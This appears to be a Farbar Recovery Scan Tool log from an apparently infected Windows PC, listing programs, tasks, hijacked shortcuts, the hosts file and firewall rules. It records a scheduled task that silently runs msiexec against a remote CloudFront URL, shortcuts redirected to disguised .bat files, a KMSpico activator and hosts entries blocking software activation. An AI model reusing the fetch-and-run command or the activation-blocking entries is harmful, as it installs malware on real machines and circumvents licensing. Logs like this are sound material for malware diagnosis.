NVIDIA PhysX System Software 9.13.0927 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0927 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.20 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.20 - NVIDIA Corporation)
ONE PIECE BURNING BLOOD (HKLM-x32\...\ONE PIECE BURNING BLOOD_is1) (Version: - )
Ontrack EasyRecovery Enterprise (HKLM-x32\...\{AE695CA4-8847-4462-98CC-023874D29E72}_is1) (Version: 10.0.5.6 - Kroll Ontrack Inc.)
Painter 2016 - Setup Files (Version: 15.0.0 - Corel Corporation) Hidden
PAK Explorer (HKLM-x32\...\{1FEA83F9-7B47-47FF-8297-08E0D07C26F4}) (Version: 1.3.0.0 - The Battlezone 2 Community Project)
Pepakura Designer 4 (HKLM-x32\...\pepakura_designer4en) (Version: - TamaSoftware)
piaip AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Python 2.7.13 (HKLM-x32\...\{4A656C6C-D24A-473F-9747-3A8D00907A03}) (Version: 2.7.13150 - Python Software Foundation)
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 3.810.810.031214 - REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.21292 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7195 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0237 - REALTEK Semiconductor Corp.)
Recover My Files (HKLM-x32\...\Recover My Files v5_is1) (Version: 5.2.1.1964 - GetData Pty Ltd)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
Resident Evil 7 / Biohazard 7 Teaser: Beginning Hour (HKLM\...\Steam App 530620) (Version: - CAPCOM Co., Ltd.)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version: - Capcom)
River City Super Sports Challenge - All Stars Special (HKLM-x32\...\River City Super Sports Challenge - All Stars Special_is1) (Version: - )
Rocket League Triton (HKLM-x32\...\Rocket League Triton_is1) (Version: - )
RPG Maker VX Ace (HKLM-x32\...\RPGVXAce_E_is1) (Version: 1.02 - Enterbrain)
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Shadow Warrior 2 (HKLM-x32\...\1434021265_is1) (Version: 2.0.0.4 - GOG.com)
Shadow Warrior 2 Deluxe Edition (HKLM-x32\...\1735987864_is1) (Version: 2.0.0.1 - GOG.com)
Shadow Warrior 2 Pre-order Exclusive (HKLM-x32\...\1267008497_is1) (Version: 2.0.0.1 - GOG.com)
SHIELD Streaming (Version: 1.7.306 - NVIDIA Corporation) Hidden
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
Sony刷机驱动安装程序 version 1.2 (HKLM-x32\...\{DCF4A01A-4ED7-4E60-8D4B-4B3F59CF3DE0}_is1) (Version: 1.2 - 北京众晶锐驰科技有限公司)
Speccy (HKLM\...\Speccy) (Version: 1.29 - Piriform)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StuffIt 12 (HKLM-x32\...\{E980B458-32CB-47A2-AA46-8232E69A5A37}) (Version: 12.0.1 - Smith Micro)
Team Fortress 2 (HKLM\...\Steam App 440) (Version: - Valve)
Telegram Desktop version 1.0.29 (HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.0.29 - Telegram Messenger LLP)
The Punisher (HKLM-x32\...\{329BF75E-4876-4687-9CAD-5AE7DE56EA22}) (Version: 1.00.0000 - THQ)
The Walking Dead A New Frontier Episode 2 (HKLM-x32\...\The Walking Dead A New Frontier Episode 2_is1) (Version: - )
TweakBit File Recovery (HKLM-x32\...\{63CF2C22-8E67-44E4-B070-E1A4774F6F1F}_is1) (Version: 7.0.0.1 - Auslogics Labs Pty Ltd)
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.9.18 - Tweaking.com)
Ultimate Marvel vs. Capcom 3 (HKLM-x32\...\Ultimate Marvel vs. Capcom 3_is1) (Version: - )
UltraISO Premium V9.62 (HKLM-x32\...\UltraISO_is1) (Version: - )
Unity Web Player (HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
VirtualCloneDrive (HKLM-x32\...\VirtualCloneDrive) (Version: 5.4.8.0 - Elaborate Bytes)
Visual Studio 2010 SP1 Runtime x64 (HKLM\...\{F6305232-7952-4CCE-BDCD-9B2E66591C4A}) (Version: 1.0.0 - Microsoft Corporation)
Visual Studio 2010 SP1 Runtime x86 (HKLM-x32\...\{AEA163A5-BA2F-4E63-9529-DE8606AC82A4}) (Version: 1.0.0 - Microsoft Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (01/27/2014 9.0.0000.00000) (HKLM\...\9CA77E2A8332A0824C54DA611BBE4CA24AB1F750) (Version: 01/27/2014 9.0.0000.00000 - Google, Inc.)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/28/2014 11.0.0000.00000) (HKLM\...\092555911492C6959D2596D612F52DCA71881CA2) (Version: 08/28/2014 11.0.0000.00000 - Google, Inc.)
Windows Driver Package - Lenovo (ACPIVPC) System (09/24/2013 19.29.2.34) (HKLM\...\EE9B1F2037C580F36D92FA431CC02BFF04C31F15) (Version: 09/24/2013 19.29.2.34 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Worms W.M.D (HKLM-x32\...\Worms W.M.D_is1) (Version: - )
XnConvert 1.73 (HKLM\...\XnConvert_is1) (Version: 1.73 - Gougelet Pierre-e)
Xperia Companion (HKLM-x32\...\{8d53ad63-24f0-4f9e-bb4f-53c7d69a67d6}) (Version: 1.5.3.0 - Sony)
Xperia Companion (x32 Version: 1.5.3.0 - Sony) Hidden
Xperia Companion Service (Version: 1.5.3.0 - Sony) Hidden
Zapya-en1.6.0.0(English) (HKLM-x32\...\{5BEB75BB-D08F-4258-B2C8-7F7ED3CBF5CE}) (Version: 1.6.0.0(English) - DewMobile,Inc.)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)
ZirYab 4 (HKLM-x32\...\ZirYab 4) (Version: 4 - abasi.org)
メイドさんとボイン魂 (HKLM-x32\...\MAIDBOIN) (Version: - )
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-4257933716-793472738-408171945-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-4257933716-793472738-408171945-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Mehrad\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-4257933716-793472738-408171945-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Mehrad\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-4257933716-793472738-408171945-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
CustomCLSID: HKU\S-1-5-21-4257933716-793472738-408171945-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Mehrad\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll (Google Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {145C840F-2CDE-4AA7-BAF2-20BDF2463548} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {21AE44F9-F19F-4852-AC22-C6B2A14A8425} - System32\Tasks\AdobeAAMUpdater-1.0-Yukiha-Mehrad => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {264A9119-B4DB-4A03-9F6B-EA5675D2C823} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2014-12-04] (@ByELDI)
Task: {28C887FE-F04E-4E92-831C-62F926ED212D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {37454118-3C6B-406A-A1E6-CB7E87FE536E} - System32\Tasks\Tweaking.com - Windows Repair Tray Icon => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe [2015-03-12] (Tweaking.com)
Task: {4C4017F8-15C4-4BFB-919B-DA7F2DFD1550} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4257933716-793472738-408171945-1001UA => C:\Users\Mehrad\AppData\Local\Google\Update\GoogleUpdate.exe [2017-04-01] (Google Inc.)
Task: {613F8D92-A2A4-498B-B1EA-1034B4C37021} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4257933716-793472738-408171945-1001Core => C:\Users\Mehrad\AppData\Local\Google\Update\GoogleUpdate.exe [2017-04-01] (Google Inc.)
Task: {8BD2A250-4ED7-43A4-B0D5-700D92907C83} - System32\Tasks\{4418A03D-888A-4AA1-899E-6C2D8D7927D3} => pcalua.exe -a "D:\Program Files (x86)\Ubisoft\Catz2\Catz.exe" -d "D:\Program Files (x86)\Ubisoft\Catz2"
Task: {B9779A6A-FA85-40E3-89E1-5417C0736F3C} - System32\Tasks\MailRuUpdater => C:\Users\Mehrad\AppData\Local\Mail.Ru\MailRuUpdater.exe
Task: {DD8C48E8-D310-44AE-A1D0-7FBB720F3B20} - System32\Tasks\Microsoft\Windows\Media Center\RegisterObject => C:\\ProgramData\\RegisterObject\\RegisterObject.exe [2017-04-09] () <==== ATTENTION
Task: {EB1143EC-3109-4200-9172-5628F340C974} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {F4067F9C-7903-4916-9841-ECA734B801F7} - System32\Tasks\Toferk => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD10SPCX-24HWST1_WD-WX61A94693PD693PD&d=20170424 /q <==== ATTENTION
Task: {F728FC5C-B33D-4C57-BB1C-19E5987E2153} - System32\Tasks\Phucoing Verfier => C:\Program Files (x86)\Gerdolesilerly\xttale.exe [2017-04-24] (Google Inc.)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Mehrad\Desktop\DАNGANRОNРA 2 Gооdbyе Desраir.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.rehcnual.bat ()
Shortcut: C:\Users\Mehrad\Desktop\Мinecraft.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.rehcnualemertxe.bat ()
Shortcut: C:\Users\Mehrad\Desktop\Woods\Stаrt BluеStaсks.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.rehcnualtrats-dh.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gооglе Chromе.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.emorhc.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Eхplorer.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ВКонтакте.lnk -> C:\Users\Mehrad\AppData\Local\Amigo\Application\amigo.exe (No File) <===== Cyrillic
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Одноклассники.lnk -> C:\Users\Mehrad\AppData\Local\Amigo\Application\amigo.exe (No File) <===== Cyrillic
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhrome.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.emorhc.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Internet Ехрlorer Вrowser.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ВКонтакте.lnk -> C:\Users\Mehrad\AppData\Local\Amigo\Application\amigo.exe (No File) <===== Cyrillic
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk -> C:\Users\Mehrad\AppData\Local\Amigo\Application\amigo.exe (No File) <===== Cyrillic
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firеfoх (2).lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.xoferif.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firеfoх.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.xoferif.bat ()
Shortcut: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfox.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.xoferif.bat ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzilla Firеfoх.lnk -> C:\Users\Mehrad\AppData\Roaming\Browsers\exe.xoferif.bat ()
ShortcutWithArgument: C:\Users\Mehrad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> url,FileProtocolHandler "hxxp://www.mail.ru/cnt/20775012?gp=811035"
==================== Loaded Modules (Whitelisted) ==============
2017-03-26 16:59 - 2014-01-24 10:57 - 00117536 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-04-24 10:57 - 2017-04-24 10:57 - 00313344 _____ () C:\Program Files (x86)\Phucoing Verfier\local64spl.dll
2016-11-01 00:15 - 2016-11-01 00:15 - 00592384 _____ () C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX64.dll
2016-06-10 02:41 - 2016-06-10 02:41 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-03-29 19:04 - 2017-03-29 19:04 - 00833024 ____N () C:\windows\system32\tprdpw32.exe
2016-08-10 15:29 - 2014-03-12 14:30 - 00092160 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
2011-09-15 09:49 - 2011-09-15 09:49 - 00086016 _____ () D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64server.exe
2017-03-14 02:34 - 2012-02-06 11:03 - 00025600 _____ () C:\Genius\ioTablet\TabletService.exe
2017-03-14 02:34 - 2015-10-16 18:27 - 00227328 _____ () C:\Genius\ioTablet\gTabletTask.exe
2017-03-14 02:34 - 2012-02-06 11:14 - 00020992 _____ () C:\Genius\ioTablet\gTabletDevMgm.dll
2017-03-14 02:34 - 2012-02-06 11:12 - 00051712 _____ () C:\Genius\ioTablet\gfMedia.dll
2017-03-14 02:34 - 2012-04-16 19:02 - 00035840 _____ () C:\Genius\ioTablet\gfBrowser.dll
2017-03-14 02:34 - 2012-02-06 11:11 - 00022528 _____ () C:\Genius\ioTablet\gfOffice.dll
2017-03-14 02:34 - 2012-02-06 11:11 - 00039936 _____ () C:\Genius\ioTablet\gfSystem.dll
2017-03-14 02:34 - 2012-02-06 11:04 - 00022016 _____ () C:\Genius\ioTablet\gfPainter.dll
2017-02-03 13:14 - 2015-04-03 18:14 - 00116472 ____N () C:\Program Files (x86)\Zapya-en\ZapyaService.exe
2015-06-26 02:42 - 2014-04-16 13:58 - 00080312 _____ () C:\Windows\system32\IGFXEXPS.DLL
2014-03-26 12:50 - 2016-08-10 15:32 - 00058864 _____ () C:\Program Files (x86)\Lenovo\Energy Manager\kbdhook.dll
2016-08-10 15:27 - 2013-10-01 14:39 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2017-04-24 01:54 - 2017-04-24 01:54 - 00005632 _____ () C:\Users\Mehrad\AppData\Roaming\90504824\145699.exe
2017-03-14 02:34 - 2012-03-23 13:29 - 00047104 _____ () C:\Genius\ioTablet\gTabTaskBar.exe
2017-03-14 02:34 - 2012-04-03 17:00 - 00171008 _____ () C:\Genius\ioTablet\gTabletXml.dll
2017-03-14 02:34 - 2012-02-06 11:06 - 00045056 _____ () C:\Genius\ioTablet\gIoTabletFunMgm.exe
2017-03-14 02:34 - 2012-02-06 11:10 - 00069120 _____ () C:\Genius\ioTablet\gAutoScroll.dll
2017-03-14 02:34 - 2012-02-06 11:11 - 00047104 _____ () C:\Genius\ioTablet\gAutoPan.dll
2017-03-14 02:34 - 2012-11-13 15:43 - 00062976 _____ () C:\Genius\ioTablet\gZoom.dll
2017-03-14 02:34 - 2012-02-06 11:07 - 00023040 _____ () C:\Genius\ioTablet\gTabletHook.dll
2017-03-14 02:34 - 2013-01-16 11:47 - 00068096 _____ () C:\Genius\ioTablet\gDeskMgm.dll
2017-03-14 02:34 - 2012-02-06 11:09 - 00045056 _____ () C:\Genius\ioTablet\gTaskSwitch.dll
2017-03-14 02:34 - 2012-05-18 18:00 - 00055296 _____ () C:\Genius\ioTablet\gSmartSearch.dll
2017-03-14 02:34 - 2012-02-06 11:10 - 00047616 _____ () C:\Genius\ioTablet\gTabSwitch.dll
2017-03-14 02:34 - 2012-02-06 11:09 - 00049152 _____ () C:\Genius\ioTablet\gVirtualDeviceSimulate.dll
2017-03-14 02:34 - 2012-02-06 11:04 - 00025088 _____ () C:\Genius\ioTablet\gPenMoveFunc.dll
2017-03-14 02:34 - 2012-02-06 11:04 - 00048128 _____ () C:\Genius\ioTablet\gVolumnCtrl.dll
2017-03-14 02:34 - 2012-07-31 18:02 - 00030720 _____ () C:\Genius\ioTablet\gPainterFunc.dll
2016-05-18 03:12 - 2016-05-18 03:12 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-03-01 15:19 - 2017-03-01 15:19 - 00166520 _____ () C:\Program Files (x86)\Hotspot Shield\bin\CrashRpt1403.dll
2017-03-14 02:34 - 2013-01-15 14:51 - 00046080 _____ () C:\Windows\system32\wintab32.dll
2017-02-03 13:14 - 2015-04-03 18:13 - 00118008 ____N () C:\Program Files (x86)\Zapya-en\ZapyaDll.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\Software\Classes\regfile: regedit.exe "%1" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\driversupport.com -> hxxps://apps.driversupport.com
IE restricted site: HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\kmpmedia.net -> hxxp://player.kmpmedia.net
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2017-03-02 17:12 - 2017-04-24 01:41 - 00001396 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 lmlicenses.wip4.adobe.com
127.0.0.1 lm.licenses.adobe.com
127.0.0.1 na1r.services.adobe.com
127.0.0.1 hlrcv.stage.adobe.com
127.0.0.1 activation.cloud.techsmith.com
127.0.0.1 oscount.techsmith.com
127.0.0.1# activation.cloud.techsmith.com
127.0.0.1 activation.cloud.techsmith.com127.0.0.1 clients2.google.com
127.0.0.1 v1.ff.avast.com
127.0.0.1 vlcproxy.ff.avast.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Desktop Background.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "IAStorIcon"
HKLM\...\StartupApproved\Run: => "COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}"
HKLM\...\StartupApproved\Run32: => "CloneCDTray"
HKLM\...\StartupApproved\Run32: => "VirtualCloneDrive"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "amigo"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "mailruhomesearch"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "XperiaCompanionAgent"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "Google Update"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "5PXT76H95I04F9G"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\StartupApproved\Run: => "9YRCG8IAZDB5VO7"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{CEC5EB8D-330A-4CC2-9779-45C9AAA699B0}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{AA16A05A-9A45-46F1-9637-E4DB7759482C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{2313B97E-F6BD-4C9A-BCA1-043C10B26A74}] => (Block) %SystemDrive%\KMPlayer\KMPlayer.exe
FirewallRules: [TCP Query User{25F81042-029B-4F92-89D2-358392D35097}C:\program files (x86)\20speed\services\tunnelplus\tunnelplus.dll] => (Allow) C:\program files (x86)\20speed\services\tunnelplus\tunnelplus.dll
FirewallRules: [UDP Query User{6F55AF1C-812F-4689-9FDF-8D4F6E163ACD}C:\program files (x86)\20speed\services\tunnelplus\tunnelplus.dll] => (Allow) C:\program files (x86)\20speed\services\tunnelplus\tunnelplus.dll
FirewallRules: [{12981242-40C2-4F43-8DA2-E38BB7148BAD}] => (Allow) C:\Users\Mehrad\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FFE4812C-28F0-42F4-B3D2-3700FC4D6561}] => (Allow) C:\Users\Mehrad\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{9FE5D313-BED9-4152-90F2-67A8BDAF6358}] => (Block) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{1F889251-5404-4472-8291-27E80746FCC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{4C10C815-D9F5-4881-BA3A-D0B3E86E7563}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{367D2277-A3CD-4ABF-AC42-FC3E29516949}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{DAC878DB-5C24-4CAB-9BD5-844F7EA495D4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{1BAE3813-79A4-4982-997F-8363E3D948FB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RESIDENT EVIL 7 biohazard Demo\re7trial.exe
FirewallRules: [{7AE40577-4A81-441C-BFE5-3911A74EFA96}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RESIDENT EVIL 7 biohazard Demo\re7trial.exe
FirewallRules: [{99B64954-A36C-403F-8DDA-A120004C52E5}] => (Allow) LPort=31637
FirewallRules: [{F166B210-0607-46BA-A06D-43F1E2E75AAD}] => (Allow) LPort=31637
FirewallRules: [{ECC83524-2AFA-478B-8390-4685BE052CCB}] => (Allow) LPort=9876
FirewallRules: [{8815F847-65F6-4CDB-B208-6F580B1A3C92}] => (Allow) LPort=9876
FirewallRules: [{3D2DA544-DA51-4BEE-8473-65DDCA3138A6}] => (Allow) LPort=67
FirewallRules: [{561082E7-C1AD-45CA-81DB-EEF12900D4C3}] => (Allow) LPort=67
FirewallRules: [{DF84DFC6-AD95-48BC-A0FB-F1B8E7BD6A3D}] => (Allow) LPort=68
FirewallRules: [{2227FD1C-4EAD-40AD-8EC5-24DAB2CCB23E}] => (Allow) LPort=68
FirewallRules: [{91CD9644-1DCE-438F-8DC2-C7DB5BD8E6AF}] => (Allow) LPort=21346
FirewallRules: [{0CDE299C-F947-496B-87A8-BF3FD28A295E}] => (Allow) LPort=21346
FirewallRules: [{2E387A90-30DB-492D-8D72-D53032428A5F}] => (Allow) LPort=31637
FirewallRules: [{6C6C5BAA-1038-4841-9B26-CA7CF29EF402}] => (Allow) LPort=31637
FirewallRules: [{8E21E8F2-520E-4DEB-B021-57BE4EA5DB52}] => (Allow) LPort=9876
FirewallRules: [{C7B2667D-21FB-4EE8-A4D5-6E30FBEC8EA4}] => (Allow) LPort=9876
FirewallRules: [{3A54BB02-2A0D-49C4-A1A8-A2C996D45466}] => (Allow) LPort=67
FirewallRules: [{D6956B9A-5F81-4CF0-B6D7-395D13F8F97E}] => (Allow) LPort=67
FirewallRules: [{F10D22F4-F414-44B8-8C73-82C547B9751F}] => (Allow) LPort=68
FirewallRules: [{F4930B3F-1523-49C9-B734-DBBD1E32AA7C}] => (Allow) LPort=68
FirewallRules: [{54801FCE-5D46-4916-9B7A-49BABF4C228A}] => (Allow) LPort=21346
FirewallRules: [{6988FAB5-BC3E-40D0-AA2C-B5CDC864B059}] => (Allow) LPort=21346
FirewallRules: [{939052B0-9114-46D4-B455-E40658D53460}] => (Block) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{57C8561D-F32D-40FB-87A1-BC0A26EF664D}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{BD2578C8-01D8-40DE-A3C8-B93E57A30900}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
